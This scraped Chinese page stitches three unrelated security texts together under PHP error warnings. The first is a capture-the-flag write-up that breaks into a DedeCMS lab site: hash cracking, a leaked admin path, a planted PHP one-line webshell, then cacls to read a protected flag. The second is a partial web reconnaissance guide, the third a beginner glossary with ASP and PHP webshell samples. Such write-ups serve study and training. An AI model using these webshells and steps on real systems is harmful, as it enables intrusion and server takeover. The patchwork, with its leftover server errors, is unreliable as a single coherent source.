Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537
明
僅供學習,禁止用于違法行為。請勿利用文章內(nèi)的相關技術從事非法測試,如因此產(chǎn)生的一切不良后果與文章作者和本公眾號無關。
題目地址
https://www.ichunqiu.com/experiment/detail?id=51123&source=1&otype=1
題目要求
要求獲取目標網(wǎng)站的FLAG信息
開啟環(huán)境后的頁面
根據(jù)提示,我們訪問http://file.ichunqiu.com/49ba59ab下載dedeCMS,下載下來是一個一鍵爆賬號密碼的軟件
輸入目標地址http://www.test.ichunqiu爆破
得到賬號和密碼MD5值
對加密MD5值進行解密
在線MD5解密:https://www.somd5.com/
得到密碼:only_system
有賬號密碼。但是后臺地址不知道,進行后臺目錄掃描
環(huán)境中tools里自帶了很多的工具,這里找到目錄掃描的工具
這里使用御劍后臺掃描工具
對每個地址進行查看,發(fā)現(xiàn),并沒有我們想要的后臺,嘗試更換字典或掃描器進行掃描,發(fā)現(xiàn)還是沒有后臺地址
百度找織夢cms后臺的方法
日志暴露后臺地址
https://blog.csdn.net/forest_fire/article/details/50944689
發(fā)現(xiàn)可以從報錯文件 /data/mysql_error_trace.inc 或 /data/mysqli_error_trace.inc 中,可得到泄露的后臺路徑,我們訪問
http://www.test.ichunqiu/data/mysql_error_trace.inc 發(fā)現(xiàn)有個目錄
進行訪問,發(fā)現(xiàn)就是后臺地址
輸入賬號密碼進行登錄,成功進入后臺
下一步我們需要上傳webshell,獲取主機權限。
百度進行查找獲取webshell方法
https://www.cnblogs.com/milantgh/p/3634550.html
在后臺界面,我們看到在模板-->標簽源碼管理處可以進行增加一個新的標簽,也可以對現(xiàn)有的便簽進行編輯
這里,我們對現(xiàn)有的標簽進行編輯寫入一句話,保存
<?php @eval($_POST['lemonlove7']); ?>
上面也有提示,文件的存放位置
訪問一下,使用環(huán)境中自帶的菜刀進行連接
成功獲取到shell
在c盤Documents and Settings(文件和設置) -->Administrator-->桌面看到了flag~ichunqiu.txt文件
進行查看,發(fā)現(xiàn)是空的,但文件大小不為0
在cmd命令中使用type進行查看看看 ,發(fā)現(xiàn)是拒絕訪問,哎,肯定是權限不夠
使用whoami查看我們現(xiàn)在的用戶權限
whoami
發(fā)現(xiàn)我們的全是system即為最高權限,但是卻還是看不falg~ichunqiu.txt,進行百度發(fā)現(xiàn)可能是對文件的權限進行了設置
windows下設置文件及其文件夾權限的方法:https://www.jb51.net/article/51907.htm
使用cacls命令對falg~ichunqiu.flag文件權限進行查看,發(fā)現(xiàn)對system用戶的權限是n即為無權限
cacls flag~ichunqiu.txt
使用cacls命令對falg~ichunqiu.flag文件權限進行修改為F
cacls flag~ichunqiu.txt /E /P system:F /C
成功的拿到flag
type flag~ichunqiu.txt
結尾
和師傅們一起成長,努力學習網(wǎng)絡安全知識。
文章來源:鵬組安全
如有侵權,請聯(lián)系我們進行刪除
文章目錄
測試對象:testphp.vulnweb.com
嘗試在谷歌中搜索:“site: testphp.vulnweb.com”,得到基本的爬蟲結果如下:
使用查詢發(fā)現(xiàn)了更多有用的信息:
參考:
http://www.mrjoeyjohnson.com/Google.Hacking.Filters.pdf
Web 服務器指紋是滲透測試的關鍵任務。了解正在運行的 web 服務器的版本和類型能夠讓測試人員確定已知的漏洞以及在測試過程中使用適當?shù)姆椒ā?/p>
a)黑盒測試:
確認web 服務器身份的最簡單最基本的方式是利用netcat查看 HTTP 響應報頭中的服務器字段。
b)測試對象:
nc google.com 80
GET
/ HTTP/1.1
Host: google.com
enter
enter
c)自動測試工具:
httprint, Burpsuite
d)在線測試:
https://www.netcraft.com/
e)示例:
參考:
網(wǎng)絡蜘蛛/機器人/爬蟲檢索 (訪問) 一個網(wǎng)頁, 然后遞歸遍歷超鏈接, 以檢索進一步的 web 內(nèi)容。他們的行為是由web根目錄中robots.txt文件的Robots Exclusion Protocol指定的。
測試對象:abc.com/robots.txt
工具: 利用wget(例如: wget http://google.com/robots.txt)
參考:http://www.robotstxt.org/
示例:http://local/mutillidae/robots.txt
Tag位于每個 HTML 文檔的 HEAD 部分, 并且應該在一個 web 站點上的下述事件中保持一致:機器人/蜘蛛/爬蟲的起始點不是從 webroot 以外的文檔鏈接開始的。
網(wǎng)絡蜘蛛/機器人/爬蟲可以故意忽略 “<META NAME=”ROBOTS”>” tag。
工具: BurpSuite
a) url:
b) 端口:
最基本和最簡單的方法是使用端口掃描儀 (如 nmap)。例如:
nmap 0-65535 192.168.1.1
c) 域名:
cmd
nslookup
all
set type=all
example.com
http://searchdns.netcraft.com/?host
-Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (require free
membership)
– MSN search: http://search.msn.com syntax: “ip:x.x.x.x” (without the quotes) o webhosting info: http://whois.webhosting.info/
-DNSstuff: http://www.dnsstuff.com/
d) 谷歌hack技術
示例:
e) 工具
對于程序員來說, 在源代碼中添加詳細注釋和元數(shù)據(jù)是非常普遍的,甚至是推薦的。但是, HTML 代碼中包含的注釋和元數(shù)據(jù)可能會對潛在攻擊者暴露內(nèi)部信息。應對源代碼中的注釋和元數(shù)據(jù)進行審查以確定是否泄露了任何信息。
工具:
請求:
響應:
工具:
一些注意事項:
在開始安全測試之前, 了解應用程序的結構是至關重要的。如果不徹底了解應用程序的布局, 就不可能對其進行徹底的測試。
a)測試目的
b)自動蜘蛛工具
c)自動化蜘蛛示例
Web 框架指紋是信息采集過程中的一個重要子任務。了解框架的類型會有很大的優(yōu)勢,特別是當這種類型已經(jīng)被滲透測試過。不僅是版本中已知的漏洞使得指紋處理如此重要, 框架以及已知文件結構中的特定錯誤同樣如此。
a) 黑盒測試
為了定義當前框架, 有幾個最常見的位置可供查找
b) HTTP 標頭
c) Cookies
確定當前 web 框架的另一個類似的、更可靠的方法是特定框架的 cookie。
d) HTML 源代碼
此技術基于在 HTML 頁面源代碼中查找某些模式。我們可以找到很多信息, 幫助測試人員識別特定的 web 應用程序。
e)特定文件和文件夾
每個應用程序在服務器上都有自己的特定文件和文件夾結構。我們可以使用工具或手動訪問它們。
f)Dirbusting 示例
https://www.exploit-db.com/ghdb/4675/
g)常見應用程序標識符
h)Nikto
i)Whatweb
https://packetstormsecurity.com/files/download/146830/web-application-security-testing.pdf
來也慚愧,菜鳥小白已經(jīng)干了三年安全產(chǎn)品的測試,但是對于滲透測試都不曾好好了解,一直停留在基礎功能測試和自動化測試的摸索上。正好我們組內(nèi)在組織滲透測試的全套課程學習,將會從最基礎的內(nèi)容開始學起,學習的內(nèi)容菜鳥小白也會整理出來,一起分享。
今天我們一起來看看一些基礎概念吧。
基礎概念
1、腳本(asp、php、jsp)
ASP:ASP即Active Server Pages,是Microsoft公司開發(fā)的服務器端腳本環(huán)境,可用來創(chuàng)建動態(tài)交互式網(wǎng)頁并建立強大的web應用程序。當服務器收到對ASP文件的請求時,它會處理包含在用于構建發(fā)送給瀏覽器的HTML(Hyper Text Markup Language,超文本標記語言)網(wǎng)頁文件中的服務器端腳本代碼。除服務器端腳本代碼外,ASP文件也可以包含文本、HTML(包括相關的客戶端腳本)和com組件調(diào)用。
PHP:PHP即“超文本預處理器”,是一種通用開源腳本語言。PHP是在服務器端執(zhí)行的腳本語言,與C語言類似,是常用的網(wǎng)站編程語言。
JSP:JSP(全稱JavaServer Pages)是由Sun Microsystems公司主導創(chuàng)建的一種動態(tài)網(wǎng)頁技術標準。JSP部署于網(wǎng)絡服務器上,可以響應客戶端發(fā)送的請求,并根據(jù)請求內(nèi)容動態(tài)地生成HTML、XML或其他格式文檔的Web網(wǎng)頁,然后返回給請求者。
2、html(css、js、html)
html:HTML稱為超文本標記語言,是一種標識性的語言。它包括一系列標簽.通過這些標簽可以將網(wǎng)絡上的文檔格式統(tǒng)一,使分散的Internet資源連接為一個邏輯整體。HTML文本是由HTML命令組成的描述性文本,HTML命令可以說明文字,圖形、動畫、聲音、表格、鏈接等。
3、HTTP協(xié)議
HTTP:http是一個簡單的請求-響應協(xié)議,它通常運行在TCP之上。它指定了客戶端可能發(fā)送給服務器什么樣的消息以及得到什么樣的響應。請求和響應消息的頭以ASCII碼形式給出;而消息內(nèi)容則具有一個類似MIME的格式。
4、CMS(B/S)
CMS:內(nèi)容管理系統(tǒng)(content management system,CMS),我們這邊一般使用的B/S架構,也就是瀏覽器訪問的方式。另外還有一種C/S架構,就是通過應用程序的訪問方式。
5、MD5
MD5:MD5信息摘要算法(英語:MD5 Message-Digest Algorithm),一種被廣泛使用的密碼散列函數(shù),可以產(chǎn)生出一個128位(16字節(jié))的散列值(hash value),用于確保信息傳輸完整一致。滲透測試中一般密碼的解碼需要使用。
6、其它概念
肉雞:被黑客入侵并被長期駐扎的計算機或服務器
抓雞:利用使用量大的程序的漏洞,使用自動化方式獲取肉雞的行為
webshell:通過web入侵的一種腳本工具,可以據(jù)此對網(wǎng)站服務進行一定程度的控制
漏洞:硬件、軟件、協(xié)議等可利用的安全缺陷,可能被攻擊者利用,對數(shù)據(jù)進行篡改、控制等。
一句話木馬:通過向服務器提交一句簡短的代碼,配合本地客戶端實現(xiàn)webshell功能的木馬。
舉例:
<%eval request("pass")%>
<%execute(request("pass"))%>
其中request("pass")接收客戶端提交的數(shù)據(jù),pass為執(zhí)行命令的參數(shù)值。
eval/execute,函數(shù)執(zhí)行客戶端命令的內(nèi)容
又如:PHP的一句話木馬
<?php eval($_POST[123]);?>
下面的代碼可以用POST的方式提交PHP語句,利用php腳本的各種函數(shù),就可以實現(xiàn)執(zhí)行系統(tǒng)命令、修改數(shù)據(jù)庫、增刪改查等各種功能。
<form method=post action=http://木馬地址>
<textarea name=123>
//這里寫PHP代碼
phpinfo();
</textarea>
<input type=submit>
</form>
提權:操作系統(tǒng)低權限的賬戶將自己提升為管理員權限使用的方法。
后門:黑客為了對主機進行長期的控制沒在機器上種植的一段程序或留下的一個“入口”
跳板:使用肉雞IP來實施攻擊其他目標,以便更好的隱藏自己的身份信息
旁站:同一個物理服務器下搭建的多個網(wǎng)站。如:服務器下有三個網(wǎng)站A、B、C,B和C就是A的旁站。
旁站入侵:即同服務器下的網(wǎng)址入侵,入侵之后可以通過提權跨目錄等手段拿到目標網(wǎng)址的權限。常見的旁站查詢工具有:WebRobot、御劍、明小子和web在線查詢等。
C段入侵:即同C段下服務器入侵。如目標IP為192.168.1.253入侵192.168.1.*的任意一臺機器,然后利用一些黑客工具嗅探獲取在網(wǎng)上傳輸?shù)母鞣N信息。常用的工具有:Cain(Windows)、Sniffit(UNIX)、Snoop、tcpdump、dsniff等
滲透測試
黑盒測試:在未授權的情況,模擬黑客的攻擊方法和思維方式,來評估計算機網(wǎng)絡系統(tǒng)可能存在的安全風險。黑盒測試考驗的是綜合能力(OS、database、script、code、思路和社工)。
白盒測試:從內(nèi)部發(fā)起,偏向于代碼審計
APT攻擊:Advanced Persistent Threat,高級可持續(xù)性攻擊,是指組織(特別是政府)或者小團體利用先進的攻擊手段對特定目標進行長期持續(xù)性網(wǎng)絡攻擊的攻擊形式,具有以下特點:
1.極強的隱蔽性
2.潛伏期長,持續(xù)性強
3.目標性強
滲透測試的特點
充滿挑戰(zhàn)與刺激;
思路和經(jīng)驗積累往往決定成敗;
滲透測試的流程
滲透測試:更全面的找出服務器的問題,更傾向于保護
明確目標——信息收集——漏洞探測——漏洞驗證——信息分析——獲取所需——信息整理——形成報告
明確目標:范圍、規(guī)則、需求
信息收集:基礎、系統(tǒng)、應用、版本(版本漏洞)、服務、人員(密碼破解)、防護
漏洞探測:系統(tǒng)漏洞、webserver漏洞、web應用漏洞、其它端口服務漏洞、通信安全
漏洞驗證:自動化驗證、手工驗證、試驗驗證、登錄猜測、業(yè)務漏洞驗證、公開資源的利用
信息分析:精準打擊、繞過防御機制、定制攻擊路徑、繞過檢測機制、繞過代碼
獲取所需:實施攻擊、獲取內(nèi)部信息、進一步滲透、持續(xù)性存在*、清理痕跡
信息整理:整理滲透工具、整理收集信息、整理
形成報告:按需整理、補充介紹、修補建議
如果可以的話,請幫忙點擊下方廣告,給菜鳥小白眾籌一點電費,謝謝~
*請認真填寫需求信息,我們會在24小時內(nèi)與您取得聯(lián)系。